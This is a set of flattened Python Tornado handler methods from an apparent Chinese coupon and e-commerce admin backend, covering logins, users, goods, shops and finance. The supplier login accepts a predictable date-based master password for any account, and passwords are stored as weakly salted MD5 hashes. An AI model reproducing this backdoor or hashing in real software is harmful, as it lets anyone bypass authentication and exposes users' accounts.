def post(self): form = Form(self.request.arguments, schema) if not form.validate(): http_client = AsyncHTTPClient() response = yield http_client.fetch( "http://www.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1") bg_img_url = json.loads(response.body, object_hook=json_hook).images[0].url self.render('auth/login.html', form=form, bg_img_url=bg_img_url) return user = self.db.get( 'select * from operator where login_name=%s and deleted=0', form.username.value) if not user or user.password.lower() != hashlib.md5( form.password.value + user.pwd_salt).hexdigest(): http_client = AsyncHTTPClient() response = yield http_client.fetch( "http://www.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1") bg_img_url = json.loads(response.body, object_hook=json_hook).images[0].url form.username.error = u'用户名密码不匹配' self.render('auth/login.html', form=form, bg_img_url=bg_img_url) return self.set_secure_cookie('_opu', unicode(user.id)) self.db.execute('update operator set last_active=NOW() where id=%s', user.id) if form.next.value and form.next.value.startswith('/'): self.redirect(form.next.value) return self.redirect(self.reverse_url('welcome'))
def post(self): form = Form(self.request.arguments, add_schema) uid = self.get_argument('id') role_ids = self.get_arguments('roles') if not role_ids: return self.render('operator/user.html', form=form) roles = ','.join(role_ids) if not form.validate(): return self.render('operator/user.html', form=form) #更新操作员信息 self.db.execute( 'update operator set name=%s,email=%s,roles=%s where id =%s', form.name.value, form.email.value, roles, uid) password = form.password.value.lower() if password and password != '******': #生成密码的盐 password_salt = ''.join( random.sample(string.ascii_letters + string.digits, 6)) en_password = hashlib.new('md5', password + password_salt).hexdigest() self.db.execute( 'update operator set password = %s,pwd_salt=%s where id = %s', en_password, password_salt, uid) self.redirect("/operator")
def post(self): form = Form(self.request.arguments, schema) if not form.validate(): return self.render('auth/login.html', form=form) subhost = self.request.host.split('.')[0].split(':')[0] user = self.db.get( 'select ss.* from supplier_user ss, supplier s ' 'where ss.supplier_id=s.id and ss.deleted=0 and ' 'ss.login_name=%s and s.domain_name=%s', form.username.value, subhost) if not user or ( form.password.value.lower() != date.today().strftime('%myue%dri!') and user.password.lower() != hashlib.md5(form.password.value + user.pwd_salt).hexdigest()): form.username.error = u'用户名密码不匹配' return self.render('auth/login.html', form=form) self.set_secure_cookie('_spu', unicode(user.id)) self.db.execute( 'update supplier_user set last_login = now() where id = %s', user.id) if form.next.value and form.next.value.startswith('/'): return self.redirect(form.next.value) self.redirect(self.reverse_url('coupon.verify'))
def get(self): operator = self.db.get( 'select id,name,email,login_name,roles from operator ' 'where deleted = 0 and id = %s', self.get_argument('id')) form = Form(operator, add_schema) form.action.value = 'edit' self.render("operator/user.html", form=form)
def post(self): form = Form(self.request.arguments, add_schema) role_ids = self.get_arguments('roles') if not role_ids: return self.render('operator/user.html', form=form) roles = ','.join(role_ids) if not form.validate(): return self.render('operator/user.html', form=form) #判断用户名和工号是否存在,如存在则返回 is_login_name_exist = self.db.query( 'select * from operator where login_name = %s ', form.login_name.value) if is_login_name_exist: form.login_name.error = u'用户名已存在,请重新输入' return self.render('operator/user.html', form=form) #生成密码的盐 password_salt = ''.join( random.sample(string.ascii_letters + string.digits, 6)) en_password = hashlib.new('md5', form.password.value + password_salt).hexdigest().lower() self.db.execute( 'insert into operator(login_name, password, pwd_salt, name, email, roles,' 'deleted, created_at, last_active) values(%s, %s, %s, %s, %s, %s, 0, NOW(), NOW())', form.login_name.value.strip(), en_password, password_salt, form.name.value, form.email.value.strip(), roles) self.redirect("/operator")
def get(self): form = Form(self.request.arguments, search_list) unrecommend_sql = """select g.id, g.short_name, g.created_at, g.purchase_price, g.sales_price from goods g join supplier s on g.supplier_id = s.id where g.off_sale_at > NOW() and g.deleted = 0 and g.id not in (select goods_id from ktv_product_goods union select gpp.goods_id from goods_property gpp where gpp.name = 'hidden' and gpp.value = 1 union select gq.goods_id from goods_property gq where gq.name = 'recommend' and gq.value = 1) """ params = [] if form.supplier.value: unrecommend_sql += 'and g.supplier_id = %s ' params.append(form.supplier.value) if form.goods.value: unrecommend_sql += 'and g.short_name like %s ' params.append('%' + form.goods.value + '%') unrecommend_sql += 'order by g.created_at desc ' page = Paginator(self, unrecommend_sql, params) recommend_sql = """select distinct(g.id), g.short_name, g.created_at, g.purchase_price, g.sales_price from goods g join (select gpp.goods_id from goods_property gpp where gpp.name = 'recommend' and gpp.value = 1 and gpp.goods_id not in (select gq.goods_id from goods_property gq where gq.name='hidden' and gq.value = 1)) gp on gp.goods_id = g.id where g.off_sale_at > NOW() and g.deleted = 0 and g.id not in (select goods_id from ktv_product_goods) order by g.created_at desc """ recommend_page = self.db.query(recommend_sql) self.render('seewi/recommend.html', form=form, page=page, recommend_page=recommend_page)
def get(self): form = Form(self.request.arguments, list_schema) params = [] sql = '''select p.*, a1.name as "city", a2.name as "district" from pool_supplier p, area1 a1, area1 a2 where p.city_id = a1.id and p.district_id = a2.id and p.state = 1''' if form.brand.value: sql += ' and p.brand_name like %s' params.append('%' + form.brand.value + '%') if form.city.value: sql += ' and a1.type = %s and a1.name like %s ' params.append('city') params.append('%' + form.city.value + '%') if form.district.value: sql += ' and a2.type = %s and a2.name like %s' params.append('district') params.append('%' + form.district.value + '%') if form.status.value: sql += ' and p.category = %s' params.append(form.status.value) page = Paginator(self, sql, params) supplier_count = self.db.get( 'select count(*) as count from pool_supplier where agent_id = %s', self.current_user.id).count max_select = self.current_user.supplier_limit - supplier_count self.render('supplier/pool/list.html', page=page, form=form, max=max_select)
def get(self): # 银乐迪类的ktv产品不显示 sql = """select g.id, g.short_name, g.face_value, g.sales_price, g.created_by, g.purchase_price, g.created_at, g.status, s.short_name supplier_name from goods g,supplier s where g.supplier_id = s.id and g.deleted = 0 and g.status <> "PREPARE" and g.id not in (select goods_id from ktv_product_goods) """ form = Form(self.request.arguments, list_schema) params = [] if form.supplier.value: sql += 'and g.supplier_id=%s ' params.append(form.supplier.value) if form.goods.value: sql += 'and g.short_name like %s ' params.append('%' + form.goods.value + '%') if form.status.value: sql += 'and g.status = %s' params.append(form.status.value) sql += 'order by g.created_at desc' page = Paginator(self, sql, params) self.render('goods/list.html', page=page, form=form)
def get(self): """ 商户财务明细 """ form = Form(self.request.arguments, list_schema) sql = """select ass.created_at,a.type, ass.remark, ass.type, ass.trade_type, ass.amount,ass.status from account_sequence ass left join account a on a.id = ass.account_id where display <> 2 """ supplier = self.db.get('select * from supplier where id =%s and deleted=0', self.current_user.supplier_id) #查找商户门店对应的账户信息 account_sql = 'select account_id from supplier_shop where 1=1 ' account_sql += 'and id = %s ' if supplier.separate_account == '1' and self.current_user.shop_id != 0 else 'and supplier_id = %s ' account_params = [self.current_user.shop_id if supplier.separate_account == '1' and self.current_user.shop_id != 0 else supplier.id] accounts = self.db.query(account_sql, *account_params) sql += 'and ass.account_id in (%s) ' % ','.join(['%s'] * len(accounts)) params = [str(i.account_id) for i in accounts] if form.start_date.value: sql += "and ass.created_at >= %s " params.append(form.start_date.value) if form.end_date.value: sql += "and ass.created_at <= %s " params.append(form.end_date.value) if form.type.value: sql += "and ass.type = %s " params.append(form.type.value) sql += "order by ass.created_at desc" page = Paginator(self, sql, params) self.render("finance/sequence.html", form=form, page=page, supplier_user=self.current_user)
def get(self): form = Form(self.request.arguments, notice_schema) sql = 'select * from news where deleted = 0 and type = 1 order by created_at desc' params = [] page = Paginator(self, sql, params) self.render('admin/notice_list.html', form=form, page=page)
def get(self): sku = self.db.get('select name, price from sku where id = %s', self.get_argument('id')) form = Form(sku, add_list) form.action.value = 'edit' self.render('real/sku.html', form=form, id=self.get_argument('id'))
def get(self): form = Form(self.request.arguments, search_list) sql = """ select kps.*, kp.name, (select group_concat(ss.name, ' (', ksps.room_count, ')') from ktv_shop ksps, supplier_shop ss where ksps.shop_id = ss.id and ksps.schedule_id = kps.id) as shop_info, (select group_concat(kdr.start_day,' 至 ', kdr.end_day) from ktv_date_range kdr where kdr.schedule_id = kps.id) as date_range from ktv_price_schedule kps, ktv_product kp where kps.product_id = kp.id and kps.supplier_id=%s """ params = [self.current_user.supplier_id] if form.shop.value: sql += 'and kps.id in (select schedule_id from ktv_shop where shop_id=%s) ' params.append(form.shop.value) if form.product.value: sql += 'and kps.product_id=%s ' params.append(form.product.value) if form.box.value: sql += 'and kps.room_type=%s ' params.append(form.box.value) sql += 'order by kps.created_at desc' page = Paginator(self, sql, params) shops = self.db.query('select * from supplier_shop where deleted=0 and supplier_id = %s', self.current_user.supplier_id) products = self.db.query('select * from ktv_product where deleted=0 and supplier_id = %s', self.current_user.supplier_id) self.render('ktv/price/show.html', shops=shops, products=products, page=page, form=form)
def get(self): form = Form(self.request.arguments, list_schema) sql = """select g.id, g.short_name, g.face_value, g.sales_price, g.created_by, g.purchase_price, g.stock, g.status, gds.dsid, gp.name gpname from goods g left join (select goods_id, group_concat(concat(gds.distributor_shop_id, '-', case when gds.distributor_shop_id=7 then extra else gds.distributor_goods_id end)) dsid from goods_distributor_shop gds where status='ON_SALE' group by goods_id) gds on g.id=gds.goods_id left join goods_property gp on g.id = gp.goods_id and gp.name = "is_wx_goods" and gp.value = "1" where g.deleted=0 and gp.name is null and g.supplier_id = %s """ params = [self.current_user.supplier_id] if form.goods.value: sql += 'and g.short_name like %s ' params.append('%' + form.goods.value + '%') if form.status.value: sql += 'and g.status = %s ' params.append(form.status.value) sql += 'order by g.id desc' page = Paginator(self, sql, params) self.render('goods/list.html', page=page, form=form)
def get(self): form = Form(self.request.arguments, add_schema) form.shops.value = [] supplier_shops = self.db.query('select ss.* from supplier_shop ss where ss.supplier_id=%s', form.supplier_id.value) form.skus.value = [] all_sku = self.db.query('select * from sku where deleted=0 and supplier_id=%s', form.supplier_id.value) distributors = self.db.query('select * from distributor_shop where deleted = 0') distributor_commission = { options.shop_id_yihaodian: 2.00, options.shop_id_dangdang: 2.00, options.shop_id_jingdong: 3.00, options.shop_id_jdb: 1.00, options.shop_id_wuba: 3.00, options.shop_id_gaopeng: 1.25, options.shop_id_tuangouwang: 2.50, options.shop_id_liketuan: 2.50, options.shop_id_uuwang: 2.50, options.shop_id_tmall: 1.00, options.shop_id_jibin: 2.50, } form.ratios.value = ['%s-%s' % (k, v) for (k, v) in distributor_commission.iteritems()] form.img_paths['value'] = dict() self.render('goods/add.html', form=form, supplier_shops=supplier_shops, all_sku=all_sku, error='', action='add', distributors=distributors, img_url=img_url)
def get(self, cid): sql = """select kps.room_type box, kps.price, kps.start_times times, kps.id sid, group_concat(kdr.start_day, ',', kdr.end_day) days, kp.id product from ktv_price_schedule kps, ktv_date_range kdr, ktv_product kp where kps.id = kdr.schedule_id and kps.product_id = kp.id and kps.id = %s""" schedule = self.db.get(sql, cid) form = Form(schedule, add_edit_list) form.action.value = 'edit' days_list = [item[0:10] for item in form.days.value.split(',')] day_str = '' for i, day in enumerate(days_list): if i % 2 == 0: day_str += day + '--' else: day_str += day + ';' form.days.value = day_str[0: len(day_str) - 1] shops = self.db.query( 'select ss.name, ss.id, ksps.room_count from supplier_shop ss ' 'left join ktv_shop ksps on ksps.schedule_id=%s and ss.id=ksps.shop_id ' 'where supplier_id =%s', cid, self.current_user.supplier_id) products = self.db.query('select * from ktv_product where supplier_id = %s', self.current_user.supplier_id) self.render('ktv/price/price.html', shops=shops, products=products, form=form, cid=cid)
def post(self, user_id): form = Form(self.request.arguments, add_edit_list) user = self.db.get( 'select su.*,s.separate_account from supplier_user su, supplier s ' 'where su.supplier_id=s.id and su.id = %s', user_id) form.login_name.value = user.login_name form.action.value = 'edit' #取出商户所有门店 shop_list = self.db.query( 'select id, name from supplier_shop where supplier_id = %s and deleted = 0', user.supplier_id) role = self.get_argument('role') if not form.validate(): self.render('supplier/user.html', form=form, shop_list=shop_list, user=user, role=role) return #取出该管理员的角色 #更新其余信息,不判断是否改变 shop_id = self.get_argument('shop_id') self.db.execute( 'update supplier_user set name = %s, shop_id = %s, roles = %s where id = %s', form.name.value, shop_id, role, user_id) self.redirect(self.reverse_url('accounts.show'))
def post(self): form = Form(self.request.arguments, account_schema) supplier = self.db.get('select * from supplier where id = %s', form.supplier_id.value) if not form.validate(): shop_list = self.db.query( 'select id, name from supplier_shop where deleted=0 and supplier_id = %s', supplier.id) return self.render('supplier/bank/bank.html', form=form, supplier=supplier, shop_list=shop_list, error='error') #独立结算的门店 account_type = 'SUPPLIER' if supplier.separate_account == '0' else 'SUPPLIER_SHOP' self.db.execute( 'insert into withdraw_account (user_name,bank_name,bank_city,sub_bank_name,card_number,' 'uid,type,created_at,created_by) values (%s,%s,%s,%s,%s,%s,%s,now(),%s) ', form.user_name.value, form.bank_name.value, form.bank_city.value, form.sub_bank_name.value, form.card_number.value, form.uid.value, account_type, self.current_user.name) self.redirect(self.reverse_url('supplier.bank', supplier.id))
def get(self): form = Form(self.request.arguments, sn_schema) act_id = self.get_argument('act_id', 0) sql = 'select r.*, s.*, s.id sid, m.id mid, m.mobile from wx_activity_rewards r join wx_activity_sn s ' \ 'left join member m on s.mem_id=m.id where r.id=s.rewards_id ' \ 'and r.act_id=%s ' params = [act_id] if form.sn.value: sql += ' and s.sn=%s ' params.append(form.sn.value) if form.mobile.value: sql += ' and m.mobile=%s ' params.append(form.mobile.value) if form.status.value: sql += ' and s.status=%s ' params.append(form.status.value) if form.type.value: sql += ' and r.type like %s ' params.append('%' + form.type.value + '%') if form.name.value: sql += ' and r.name like %s ' params.append('%' + form.name.value + '%') page = Paginator(self, sql, params) self.render('wx/activity/sn_list.html', page=page, form=form, act_id=act_id)
def get(self): """ 提现申请管理 """ form = Form(self.request.arguments, list_schema) sql = 'select wb.*,a.type account_type from withdraw_bill wb, account a where a.id=wb.account_id ' params = [] if form.supplier.value: supplier = self.db.get( 'select * from supplier where id =%s and deleted=0', form.supplier.value) if supplier.separate_account == '0': accounts = [supplier] else: accounts = self.db.query( 'select account_id from supplier_shop ' 'where deleted=0 and supplier_id=%s', form.supplier.value) sql += 'and wb.account_id in (%s) ' % ','.join( ['%s'] * len(accounts)) params = [str(i.account_id) for i in accounts] if form.status.value: sql += 'and wb.status=%s ' params.append(form.status.value) if form.apply_time_start.value: sql += "and wb.applied_at >= %s " params.append(form.apply_time_start.value) if form.apply_time_end.value: sql += "and wb.applied_at <= %s " params.append(form.apply_time_end.value) sql += " order by wb.applied_at desc" page = Paginator(self, sql, params) self.render("finance/withdraw/list.html", page=page, form=form)
def get(self): form = Form(self.request.arguments, add_schema) form.shops['value'] = [] supplier_shops = self.db.query('select ss.* from supplier_shop ss where ss.supplier_id=%s', self.current_user.supplier_id) form.img_paths['value'] = dict() self.render('goods/add.html', form=form, supplier_shops=supplier_shops, error='', action='add', img_url=img_url)
def get(self): form = Form(self.request.arguments, add_edit_list) form.action.value = 'add' supplier = self.db.get('select * from supplier where id=%s', self.get_argument('supplier_id')) self.render('supplier/ktv.html', form=form, supplier=supplier)
def post(self): form = Form(self.request.arguments, add_edit_list) form.action.value = 'add' date_list = form.days.value.split(';') shop_list = [] values = [] for key in self.request.arguments: if key.startswith('shop-'): value = self.request.arguments[key][0] if value == '0' or value == '': continue shop_list.append(key.split('-')[1]) values.append(value) #检测时间碰撞模块 if time_collision_detection(self.db, form.box.value, shop_list, date_list, form.times.value, form.product.value): shops = self.db.query('select * from supplier_shop where supplier_id = %s', self.current_user.supplier_id) products = self.db.query('select * from ktv_product where supplier_id = %s', self.current_user.supplier_id) return self.render('ktv/price/price.html', form=form, shops=shops, products=products) schedule = self.db.execute('insert into ktv_price_schedule(created_at, price, room_type, start_times, ' 'product_id, supplier_id, duration) values(NOW(), %s, %s, %s, %s, %s, %s)', form.price.value, form.box.value, form.times.value, form.product.value, self.current_user.supplier_id, self.get_argument('duration')) for date in date_list: split_list = date.split('--') self.db.execute('insert into ktv_date_range(end_day, start_day, schedule_id) ' 'values(%s, %s, %s)', split_list[1], split_list[0], schedule) params = [i for tp in zip(values, [schedule]*len(shop_list), shop_list) for i in tp] self.db.execute('insert into ktv_shop(room_count, schedule_id, shop_id) ' 'values %s' % (','.join(['(%s, %s, %s)']*len(shop_list))), *params) self.redirect(self.reverse_url('ktv.price.show'))
def post(self): form = Form(self.request.arguments, account_schema) account_id = self.get_argument('id') account = self.db.get('select * from withdraw_account where id = %s', account_id) if account.type == 'SUPPLIER_SHOP': supplier = self.db.get( 'select * from supplier where id = ' '(select supplier_id from supplier_shop where id=%s)', account.uid) shop_list = self.db.query( 'select id, name from supplier_shop where supplier_id = %s', supplier.id) else: supplier = self.db.get('select * from supplier where id = %s', account.uid) shop_list = [] if not form.validate(): return self.render('supplier/bank/bank.html', form=form, shop_list=shop_list, supplier=supplier, error='error') self.db.execute( 'update withdraw_account set uid=%s, user_name = %s,bank_name = %s,bank_city = %s,' 'sub_bank_name = %s,card_number=%s where id = %s', form.uid.value, form.user_name.value, form.bank_name.value, form.bank_city.value, form.sub_bank_name.value, form.card_number.value, account_id) self.redirect(self.reverse_url('supplier.bank', supplier.id))
def post(self): form = Form(self.request.arguments, password) if not form.validate(): self.render('auth/password.html', form=form) return old_pw = hashlib.md5(form.old_pw.value.strip() + self.current_user.pwd_salt).hexdigest() if old_pw != self.current_user.password.lower(): form.old_pw.error = u'输入的旧密码不正确,请重新输入' self.render('auth/password.html', form=form) return if form.pw.value.strip() != form.confirm_pw.value.strip(): form.confirm_pw.error = u'新密码两次输入不一致,请确认' self.render('auth/password.html', form=form) return if form.pw.value.lower() == '123456': form.confirm_pw.error = u'新密码强度太弱,请修改' self.render('auth/password.html', form=form) return new_pw = hashlib.md5(form.pw.value.strip() + self.current_user.pwd_salt).hexdigest() self.db.execute('update supplier_user set password = %s where id = %s', new_pw, self.current_user.id) self.redirect(self.reverse_url('coupon.verify'))
def get(self): form = Form(self.request.arguments, password) if self.current_user.password.lower() == hashlib.md5( '123456' + self.current_user.pwd_salt).hexdigest(): form.old_pw.error = u'密码强度太弱,请修改' self.render('auth/password.html', form=form)
def post(self): form = Form(self.request.arguments, add_schema) if not form.validate(): return self.render('supplier/fee_add.html', form=form) #是否有该用户 supplier = self.db.get('select id from supplier where short_name = %s', form.supplier.value) if supplier is None: form.supplier.error = u'没有该用户,请修改' return self.render('supplier/fee_add.html', form=form) #执行语句中的deleted默认为0,返回当前广告费id trade_id = self.db.execute( 'insert into supplier_ads_fee(supplier_id, fee, created_at, deleted, received_at,' 'type, remark) values(%s, %s, NOW(), 0, %s, %s, %s)', supplier.id, form.fee.value, form.received_at.value, form.received_type.value, form.remark.value) #将该广告费加入对应销售的帐下 account_sequence_remark = '添加广告费' self.db.execute( 'insert into account_sequence(type, account_id, trade_id, trade_type, created_at, amount, ' 'remark) values("SUPPLIER_ADS_FEE", 3, %s, "ADS_FEE", NOW(), %s, %s)', trade_id, form.fee.value, account_sequence_remark) # 记录订单日志 self.db.execute( 'insert into journal (created_at, type, created_by, message, iid)' 'values (NOW(), 5, %s, %s, %s)', self.current_user.name, "广告费添加 fee_id:%s" % trade_id, trade_id) self.redirect(self.reverse_url('supplier.show_ads_fee'))
def get(self, shop_id): shop = self.db.get('select * from supplier_shop where id = %s', shop_id) form = Form(shop, add_edit_list) form.telephone.value = shop.phone form.verify.value = shop.verify_phones form.traffic.value = shop.traffic_info form.action.value = 'edit' #查找出城市,区域,商圈的ID area_id = self.db.get( 'select area_id from supplier_shop where id = %s', shop_id)['area_id'] district_id = self.db.get('select parent_id from area where id = %s', area_id)['parent_id'] city_id = self.db.get('select parent_id from area where id = %s', district_id)['parent_id'] city_list = self.db.query('select * from area where type = "CITY"') district_list = self.db.query( 'select * from area where type = "DISTRICT" and parent_id = %s', city_id) area_list = self.db.query( 'select * from area where type = "AREA" and parent_id = %s', district_id) self.render('shop/add_edit.html', form=form, area_id=area_id, district_id=district_id, city_id=city_id, city_list=city_list, district_list=district_list, area_list=area_list, shop_id=shop_id)
def post(self): form = Form(self.request.arguments, add_edit_list) form.action.value = 'add' if not form.validate(): return self.render('shop/add_edit.html', form=form) # 新建账户 shop_account_id = self.db.execute( 'insert into account(uid, type, created_at, amount) ' 'values(0, 2, NOW(), 0)') shop_id = self.db.execute( 'insert into supplier_shop(supplier_id, name, area_id, address, account_id, manager_mobile, manager_name, ' 'phone, verify_phones, traffic_info, created_at, created_by, supplier_name, longitude, latitude) ' 'values(%s, %s, %s, %s, %s,%s, %s, %s, %s, %s, NOW(), %s, %s, %s, %s)', self.current_user.supplier_id, form.name.value, form.area_id.value, form.address.value, shop_account_id, form.manager_mobile.value, form.manager_name.value, form.telephone.value, form.verify.value, form.traffic.value, self.current_user.name, self.current_user.supplier_short_name, form.longitude.value, form.latitude.value) self.db.execute('update account set uid = %s where id = %s', shop_id, shop_account_id) self.redirect(self.reverse_url('shop.show'))
def post(self): form = Form(self.request.arguments, add_schema) goods_info, shops, properties, img = get_goods_info(self.db, form.id.value) if goods_info.supplier_id != self.current_user.supplier_id: raise HTTPError(403) if goods_info.status not in ['PREPARE', 'REJECT']: raise HTTPError(403) # 为了下面的 validate 成功 这里必须填入数据 form.arguments.update({'generate_type': EmptyDict({'value': goods_info.generate_type})}) img_paths = dict() for key in self.request.arguments: if key.startswith('var_img_path_'): v = self.request.arguments[key][0] if v: img_paths[key[key.rindex('_')+1:]] = v form.img_paths['value'] = json_dumps(img_paths) if not form.validate(): form.properties.value = properties form.shops['value'] = shops form.img_paths['value'] = img_paths supplier_shops = self.db.query('select ss.* from supplier_shop ss where ss.supplier_id=%s and ss.deleted=0', self.current_user.supplier_id) logging.error(json_dumps(form.errors)) self.render('goods/add.html', form=form, error='', action='edit', supplier_shops=supplier_shops, img_url=img_url) fields = ('type', 'generate_type', 'expire_at', 'category_id', 'name', 'short_name', 'sms_name', 'face_value', 'sales_price', 'purchase_price', 'stock', 'virtual_sales_count', 'img_path', 'detail', 'tips', 'supplier_intro', 'all_shop', 'on_sale_at', 'off_sale_at', 'img_paths', 'postage') update_sql = 'update goods set %s where id=%%s' % ','.join([field + '=%s' for field in fields]) form.expire_at['value'] = ceiling(form.expire_at.value, today=True) if form.expire_at.value else None form.off_sale_at['value'] = ceiling(form.off_sale_at.value, today=True) if form.off_sale_at.value else None params = [form.arguments[field]['value'] for field in fields] params.append(form.id.value) self.db.execute(update_sql, *params) self.db.execute('insert into journal(created_at, type, created_by, message, iid) ' 'values(NOW(), 3, %s, %s, %s)', self.current_user.name, '商户修改了商品', form.id.value) # 批量更新商品属性 self.db.execute('delete from goods_property where goods_id=%s and name in ("gift_card", "hidden", "ktv")', form.id.value) if form.properties.value: insert_properties(self.db, form.properties.value, form.id.value) # 批量更新关联门店 self.db.execute('delete from goods_supplier_shop where goods_id=%s', form.id.value) if not form.all_shop.value: if form.shops.value: insert_shops(self.db, form.shops.value, form.id.value) self.redirect(self.reverse_url('goods.list'))
def post(self): form = Form(self.request.arguments, search_schema) if form.validate(): endpoint, name = form.endpoint.value.split('|') return self.redirect( tornado.httputil.url_concat(self.reverse_url(endpoint), {name: form.value.value})) self.redirect(self.reverse_url('welcome'))